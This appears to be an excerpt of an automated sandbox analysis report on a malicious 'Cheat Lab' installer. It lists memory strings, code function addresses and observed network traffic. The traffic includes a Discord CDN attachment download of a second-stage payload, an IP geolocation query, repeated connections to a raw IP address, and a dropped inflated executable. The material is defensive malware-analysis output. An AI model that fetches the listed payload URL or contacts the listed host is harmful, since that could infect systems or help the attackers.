                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: connect.exe, connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
                    Source: LuaJIT.exe, 00000009.00000003.1935036216.0000022EB5AC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
                    Source: connect.exe, connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: connect.exe, connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: LuaJIT.exe.2.drString found in binary or memory: https://luajit.org/
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: https://www.advancedinstaller.com
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: https://www.digicert.com/CPS0
                    Source: connect.exeString found in binary or memory: https://www.ecosia.org/new
                    Source: connect.exeString found in binary or memory: https://www.ecosia.org/newt
                    Source: connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: connect.exe, connect.exe, 00000016.00000002.2135618138.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2135618138.000000000402B000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2114701460.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000003.2112585843.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: https://www.thawte.com/cps0/
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: https://www.thawte.com/repository0W
                    Source: unknownDNS traffic detected: queries for: ip-api.com
                    Source: global trafficHTTP traffic detected: GET /attachments/1166694393298817025/1171047481182793729/2.txt HTTP/1.1User-Agent: SunCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=5TVRDgPAgt7sc6gsEttnfN0eDDrfzltqZkEmXeQrSGI-1699281311-0-Ach3L7F2jrD2g1+SXtBkwMSCeBQHpGNsVTTE68SlkNmKmSeVEdy1XlrN3NZRaM5Usel7HW4WuQx/wkDdjnJvM5Q=; _cfuvid=raqL3qnypn7be7P8ZI1DqIF7wMtLn1AIkoosLiGT3OU-1699281311839-0-604800000
                    Source: global trafficHTTP traffic detected: GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1Content-Type: application/jsonUser-Agent: SunHost: ip-api.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /attachments/1166694393298817025/1171047481182793729/2.txt HTTP/1.1Content-Type: application/jsonUser-Agent: SunHost: cdn.discordapp.comCache-Control: no-cache
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.71.112
                    Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.8:49710 version: TLS 1.2

                    System Summary

                    barindex
                    Drops large PE files
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeFile dump: connect.exe.9.dr 1074015689Jump to dropped file
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F36A506_2_00F36A50
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F6F0326_2_00F6F032
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F5C2CA6_2_00F5C2CA
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F692A96_2_00F692A9
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F5E2706_2_00F5E270
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F684BD6_2_00F684BD
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F5A5876_2_00F5A587
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F6D8D56_2_00F6D8D5
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F3C8706_2_00F3C870
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F549206_2_00F54920
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F5A9156_2_00F5A915
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F60A486_2_00F60A48
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F39CC06_2_00F39CC0
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F65D6D6_2_00F65D6D
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B006919_3_00007FF734B00691
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B037C89_3_00007FF734B037C8
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B028C09_3_00007FF734B028C0
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B0D0F39_3_00007FF734B0D0F3
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B096159_3_00007FF734B09615
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B0D9AE9_3_00007FF734B0D9AE
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B056FC9_3_00007FF734B056FC
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B0877F9_3_00007FF734B0877F
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B0D0819_3_00007FF734B0D081
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B0671B9_3_00007FF734B0671B
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B07F7A9_3_00007FF734B07F7A
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_3_00007FF734B0D6469_3_00007FF734B0D646
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A5CA409_2_00007FF738A5CA40
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AF79249_2_00007FF738AF7924
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AE79709_2_00007FF738AE7970
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A8BAD09_2_00007FF738A8BAD0
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AF7A409_2_00007FF738AF7A40
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A4BA909_2_00007FF738A4BA90
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B1BBD89_2_00007FF738B1BBD8
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AE7BF49_2_00007FF738AE7BF4
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A61B509_2_00007FF738A61B50
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AB9B609_2_00007FF738AB9B60
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AF7B609_2_00007FF738AF7B60
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A4BC309_2_00007FF738A4BC30
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AF7C7C9_2_00007FF738AF7C7C
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A83C609_2_00007FF738A83C60
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AE7E909_2_00007FF738AE7E90
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738ABC0009_2_00007FF738ABC000
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B0FF709_2_00007FF738B0FF70
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AE80F89_2_00007FF738AE80F8
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B131F49_2_00007FF738B131F4
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A911809_2_00007FF738A91180
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AF51849_2_00007FF738AF5184
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AD51609_2_00007FF738AD5160
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AFB4489_2_00007FF738AFB448
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B055C49_2_00007FF738B055C4
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A8D6B09_2_00007FF738A8D6B0
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B0B6BC9_2_00007FF738B0B6BC
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AAF6509_2_00007FF738AAF650
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B1175C9_2_00007FF738B1175C
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B057409_2_00007FF738B05740
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AD99109_2_00007FF738AD9910
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AFB8FC9_2_00007FF738AFB8FC
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B129E09_2_00007FF738B129E0
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A56A009_2_00007FF738A56A00
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AE89489_2_00007FF738AE8948
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738ADAB009_2_00007FF738ADAB00
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A56BC09_2_00007FF738A56BC0
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AE8C149_2_00007FF738AE8C14
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B0ACB09_2_00007FF738B0ACB0
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B12C749_2_00007FF738B12C74
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AF4C849_2_00007FF738AF4C84
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AECD1C9_2_00007FF738AECD1C
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738ABAD609_2_00007FF738ABAD60
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B06FC49_2_00007FF738B06FC4
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AF70809_2_00007FF738AF7080
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B082B09_2_00007FF738B082B0
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A822909_2_00007FF738A82290
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AE83749_2_00007FF738AE8374
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AEC4CC9_2_00007FF738AEC4CC
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B004E89_2_00007FF738B004E8
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B0C47C9_2_00007FF738B0C47C
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AD45309_2_00007FF738AD4530
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738AE86549_2_00007FF738AE8654
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B128FC9_2_00007FF738B128FC
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738B048289_2_00007FF738B04828
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738A9287E9_2_00007FF738A9287E
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FDFFCA4018_2_00007FF6FDFFCA40
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0AFF7018_2_00007FF6FE0AFF70
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE05C00018_2_00007FF6FE05C000
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0880F818_2_00007FF6FE0880F8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE087E9018_2_00007FF6FE087E90
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE001B5018_2_00007FF6FE001B50
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE097B6018_2_00007FF6FE097B60
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE059B6018_2_00007FF6FE059B60
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE087BF418_2_00007FF6FE087BF4
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0BBBD818_2_00007FF6FE0BBBD8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FDFEBC3018_2_00007FF6FDFEBC30
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE023C6018_2_00007FF6FE023C60
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE097C7C18_2_00007FF6FE097C7C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE08797018_2_00007FF6FE087970
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE097A4018_2_00007FF6FE097A40
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FDFEBA9018_2_00007FF6FDFEBA90
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE02BAD018_2_00007FF6FE02BAD0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0A574018_2_00007FF6FE0A5740
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0B175C18_2_00007FF6FE0B175C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE07991018_2_00007FF6FE079910
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE09B8FC18_2_00007FF6FE09B8FC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE09792418_2_00007FF6FE097924
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0A55C418_2_00007FF6FE0A55C4
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE04F65018_2_00007FF6FE04F650
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE02D6B018_2_00007FF6FE02D6B0
